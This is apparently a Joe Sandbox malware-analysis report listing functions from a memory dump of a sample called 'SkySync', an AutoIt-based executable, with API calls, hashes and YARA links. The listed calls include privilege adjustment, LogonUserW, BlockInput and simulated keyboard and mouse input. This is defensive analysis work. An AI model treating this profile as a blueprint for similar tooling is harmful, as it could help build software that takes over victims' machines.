AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AE9410
GetLastError.KERNEL32 ref: 00AE941D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 4244140340-0
Opcode ID: 511d067c1d8f7fa615e582f907c2d4d0f55ee609c9e81887e4e9c1248457cc8f
Instruction ID: 859b9dd20b2408561b0ce102ad9b24691237a36534993bffef71d7e418faddde
Opcode Fuzzy Hash: 511d067c1d8f7fa615e582f907c2d4d0f55ee609c9e81887e4e9c1248457cc8f
Instruction Fuzzy Hash: 7C11BFB1414309AFE728EF65DC85D6BB7BCEB44310B20812EE44987281EB30AC41CB60

Function 00AF42D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AF42FF
DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00AF433C
CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AF4345

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 0955e3b18614eb4898c33c92f6b31e32f472397d31d56b7487e39b33e931dead
Instruction ID: 6af3cb77620602ac1a9a761f90a20e76f126446ef3e241fab5cfef0899eb8382
Opcode Fuzzy Hash: 0955e3b18614eb4898c33c92f6b31e32f472397d31d56b7487e39b33e931dead
Instruction Fuzzy Hash: 581182B1910229BEE7109BE89C48FBFBBBCEB0C710F000256BA14FB191D6745D0087A1

Function 00AF4F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AF4F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AF4F5C
FreeSid.ADVAPI32(?), ref: 00AF4F6C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 13035d0f9356223204b2e0e8488922cd6cabe2bfdddce9c3bbb60173c90f6454
Instruction ID: 041177567f776e601b3bcf615a6978262fc5787ed6222f7c892b1f9dfdd5b8bd
Opcode Fuzzy Hash: 13035d0f9356223204b2e0e8488922cd6cabe2bfdddce9c3bbb60173c90f6454
Instruction Fuzzy Hash: A6F03C7592120CBFEB00DFE09C89AAEBBB8EB08201F004469A501E2581D6355A048B50

Function 00AF1AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AF1B01
keybd_event.USER32(?,7684A2E0,?,00000000), ref: 00AF1B14

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 2d016f13451538d59ad41c1c6354542e0fbdc0d22b15b56fd062ca5dc9d424c9
Instruction ID: a934a69146e920e838c95449bcfb841dcecdc2059e7f3b565ebfff6f43d38381
Opcode Fuzzy Hash: 2d016f13451538d59ad41c1c6354542e0fbdc0d22b15b56fd062ca5dc9d424c9
Instruction Fuzzy Hash: 37F0497190020DEBDB10DF94C805BFE7BB4FF14315F00804AF955A6292D7799616DF94

Function 00AFA6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00B09B52,?,00B2098C,?), ref: 00AFA6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00B09B52,?,00B2098C,?), ref: 00AFA6EC

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e4531f81fe4521381163330e1b268594809aabd7aea13d21b5e2e1232ffb01f9
Instruction ID: 44bab6d2d1d004619b424e7567e83efedaa2ad02ff237412e644d4b87822702a
Opcode Fuzzy Hash: e4531f81fe4521381163330e1b268594809aabd7aea13d21b5e2e1232ffb01f9
Instruction Fuzzy Hash: F6F0823551422EBBDB20AFA4CC88FEA77ACAF09361F008156B908D7181DA309940CBE5

Function 00AE8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AE8F27), ref: 00AE8DFE
CloseHandle.KERNEL32(?,?,00AE8F27), ref: 00AE8E10

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ab4d235356266144627ba2a0192732d6ffb4a83429fd031686a70f89470c1476
Instruction ID: 789bfb1c2298e6655fd7a1a28415d123a2116b3eec76ec3210147b50f55739e9
Opcode Fuzzy Hash: ab4d235356266144627ba2a0192732d6ffb4a83429fd031686a70f89470c1476
Instruction Fuzzy Hash: FFE04632020600EFE7323B20ED18EB37BADEB04310B108829F49A80471CB22AC90DB10

Function 00ABA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00AB8F87,0000FCD7,?,?,00000001), ref: 00ABA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ABA393

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8d655d5eb21e234d16e07c6454106404d5a4c1f7ad481430585489ca14980f81
Instruction ID: 678cec1f0c4ebaed1ced9813bf043b88b1a4f46419079ca6d6e624132a64e38e
Opcode Fuzzy Hash: 8d655d5eb21e234d16e07c6454106404d5a4c1f7ad481430585489ca14980f81
Instruction Fuzzy Hash: 14B0923107420CEBCA507B91EC09B883F68EB48A62F004010F60D46462CF6254528B99

Function 00AB885B Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AB8874

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: d72408f0a4f387c7425c5f3a5dcffff466d658e714584a5b47d2c196f4fcdc8e
Instruction ID: 6b026a67ee1547bf65dc68a7e6a5c83758b1126f71153f8af517d3eef422af0d
Opcode Fuzzy Hash: d72408f0a4f387c7425c5f3a5dcffff466d658e714584a5b47d2c196f4fcdc8e
Instruction Fuzzy Hash: AD41D2B1D00B068BDB24CF5DE8557AABBF8FB48306F10806ED515E72A1CB789880CF51

Function 00B045D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00B045F0

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 925da0d75ab701b6c5b7e0dd7520e1c44935d6f53cdcd9f3f63deb047586afc0
Instruction ID: 26694374a69a7ef97faa2d71112f3ac79e94aa6475e48e8ea3dd8fc207e2d565
Opcode Fuzzy Hash: 925da0d75ab701b6c5b7e0dd7520e1c44935d6f53cdcd9f3f63deb047586afc0
Instruction Fuzzy Hash: B8E0DF753102059FC710AF6AE901E8AFBE8EFA8760F008016FD09C7391DF70E8018B90

Function 00AF51E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AF5205

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 0a52fe25506cfaf7072b6b49e7577eb5fa047539370ef124628f86b25d401c8a
Instruction ID: d18c70592009d8fc121afc9d3989490058c99742557617b2f63d0a47ce65b5bb
Opcode Fuzzy Hash: 0a52fe25506cfaf7072b6b49e7577eb5fa047539370ef124628f86b25d401c8a
Instruction Fuzzy Hash: 4FD052A8960E0E38EC2833F48E0FF361288E3017C0F84434973028A0C2ECD47886A4B9

Function 00AE9369 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AE8FA7), ref: 00AE9389

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 6a9324628a0b67aa0cd73ae368fe154bb139bd25ab226aff8ebf23b8b4392138
Instruction ID: 409aab7f44a5b61e3d8cdf11ce595d12e8f08a59fd5e88374142f60efaddd2be
Opcode Fuzzy Hash: 6a9324628a0b67aa0cd73ae368fe154bb139bd25ab226aff8ebf23b8b4392138
Instruction Fuzzy Hash: 76D05E3226050EABEF019EA4DC01EAF3B69EB04B01F408111FE15D60A1C775D835AB60

Function 00AD0722 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00AD0734

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 4184add9b4a29c885493c2e39b227ea82974536d15b10871c36f2691e141da43
Instruction ID: 5d7ec8d5a65080f925c67130f18babc1095bcbf59fe494374320260cef74f05c
Opcode Fuzzy Hash: 4184add9b4a29c885493c2e39b227ea82974536d15b10871c36f2691e141da43
Instruction Fuzzy Hash: 7EC04CF181010DDBDB15DBA0D988EEF77BCAB04304F140056A106B2110D7789B448B71

Function 00ABA354 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ABA35A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9ed12c4973ad14ba68b86bc6efb87146a8dcac5693ae6dcbb869385ff559690b
Instruction ID: dc9ea0e55ef37ba5a9691466df4b83eb3a23c12df67cb8fa51e16aec1a7431ed
Opcode Fuzzy Hash: 9ed12c4973ad14ba68b86bc6efb87146a8dcac5693ae6dcbb869385ff559690b
Instruction Fuzzy Hash: A2A0113002020CEB8A002B82EC08888BFACEA082A0B008020F80C020228B32A8228A88

Function 00B07EF0 Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B07F45
DeleteObject.GDI32(00000000), ref: 00B07F57
DestroyWindow.USER32 ref: 00B07F65
GetDesktopWindow.USER32 ref: 00B07F7F
GetWindowRect.USER32(00000000), ref: 00B07F86
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B080C7
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B080D7
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B0811F
GetClientRect.USER32(00000000,?), ref: 00B0812B
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B08165
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B08187
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B0819A
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B081A5
GlobalLock.KERNEL32(00000000), ref: 00B081AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B081BD
GlobalUnlock.KERNEL32(00000000), ref: 00B081C6
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B081CD
GlobalFree.KERNEL32(00000000), ref: 00B081D8
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B081EA
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B23C7C,00000000), ref: 00B08200
GlobalFree.KERNEL32(00000000), ref: 00B08210
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B08236
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B08255
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B08277
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B08464

Strings

static, xrefs: 00B0815F, 00B082B6
DISPLAY, xrefs: 00B082C7
, xrefs: 00B083EA
AutoIt v3, xrefs: 00B08117

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 668382f0c8b33b259e80e2eb5210e22eaa0cc281fa8548927d4e86befad4e492
Instruction ID: a82ccffaf58ae906f35454c8e91e1007df14a2b1b93c9c946dbf803f928ac442
Opcode Fuzzy Hash: 668382f0c8b33b259e80e2eb5210e22eaa0cc281fa8548927d4e86befad4e492
Instruction Fuzzy Hash: 0B026F71A10115EFDB14DF64DD89EAE7BB9FB48310F048198F915AB2A1DB31AD41CB60

Function 00B13BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B20980), ref: 00B13C65
IsWindowVisible.USER32(?), ref: 00B13C89

Strings

UNCHECK, xrefs: 00B13EC1
ADDSTRING, xrefs: 00B13D54
SETCURRENTSELECTION, xrefs: 00B13DF4
CHECK, xrefs: 00B13EAB
GETLINECOUNT, xrefs: 00B13F04
GETCURRENTCOL, xrefs: 00B13F66
TABRIGHT, xrefs: 00B13CDB
SENDCOMMANDID, xrefs: 00B14018
HIDEDROPDOWN, xrefs: 00B13D3E
TABLEFT, xrefs: 00B13CC5
SHOWDROPDOWN, xrefs: 00B13D1E
DELSTRING, xrefs: 00B13D87
ISVISIBLE, xrefs: 00B13C75
GETSELECTED, xrefs: 00B13EE1
SELECTSTRING, xrefs: 00B13E44
GETLINE, xrefs: 00B13FD9
GETCURRENTLINE, xrefs: 00B13F2B
ISENABLED, xrefs: 00B13CA9
GETCURRENTSELECTION, xrefs: 00B13E21
EDITPASTE, xrefs: 00B13F9D
ISCHECKED, xrefs: 00B13E77
CURRENTTAB, xrefs: 00B13CFB
FINDSTRING, xrefs: 00B13DB4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 7e4cbb410c82b8d8b34fdee60a20940a70b1877fc7d9ce2eee9949be02bacb56
Instruction ID: c77891ef6e95f0902e6d7a13ffe24efe3c1f27b29090f8f290b944669585ea4e
Opcode Fuzzy Hash: 7e4cbb410c82b8d8b34fdee60a20940a70b1877fc7d9ce2eee9949be02bacb56
Instruction Fuzzy Hash: E5D171302043019FCB14EF10C691EAA77E5EF94754F5488A8F9465B2E3DB31EE8ADB91

Function 00B1ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B1AC55
GetSysColorBrush.USER32(0000000F), ref: 00B1AC86
GetSysColor.USER32(0000000F), ref: 00B1AC92
SetBkColor.GDI32(?,000000FF), ref: 00B1ACAC
SelectObject.GDI32(?,?), ref: 00B1ACBB
InflateRect.USER32(?,000000FF,000000FF), ref: 00B1ACE6
GetSysColor.USER32(00000010), ref: 00B1ACEE
CreateSolidBrush.GDI32(00000000), ref: 00B1ACF5
FrameRect.USER32(?,?,00000000), ref: 00B1AD04
DeleteObject.GDI32(00000000), ref: 00B1AD0B
InflateRect.USER32(?,000000FE,000000FE), ref: 00B1AD56
FillRect.USER32(?,?,?), ref: 00B1AD88
GetWindowLongW.USER32(?,000000F0), ref: 00B1ADB3

Part of subcall function 00B1AF18: GetSysColor.USER32(00000012), ref: 00B1AF51
Part of subcall function 00B1AF18: SetTextColor.GDI32(?,?), ref: 00B1AF55
Part of subcall function 00B1AF18: GetSysColorBrush.USER32(0000000F), ref: 00B1AF6B
Part of subcall function 00B1AF18: GetSysColor.USER32(0000000F), ref: 00B1AF76
Part of subcall function 00B1AF18: GetSysColor.USER32(00000011), ref: 00B1AF93
Part of subcall function 00B1AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B1AFA1
Part of subcall function 00B1AF18: SelectObject.GDI32(?,00000000), ref: 00B1AFB2
Part of subcall function 00B1AF18: SetBkColor.GDI32(?,00000000), ref: 00B1AFBB
Part of subcall function 00B1AF18: SelectObject.GDI32(?,?), ref: 00B1AFC8
Part of subcall function 00B1AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00B1AFE7
Part of subcall function 00B1AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B1AFFE
Part of subcall function 00B1AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00B1B013

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 64836fe8e149c56d7ff1bdd41c93c6f649e6d6c2df1b12a7ce624913ac3c268d
Instruction ID: f65cdcb5613c1438187b840aa0b3877811f8c1cca84f53ba05d5ebf0836051f8
Opcode Fuzzy Hash: 64836fe8e149c56d7ff1bdd41c93c6f649e6d6c2df1b12a7ce624913ac3c268d
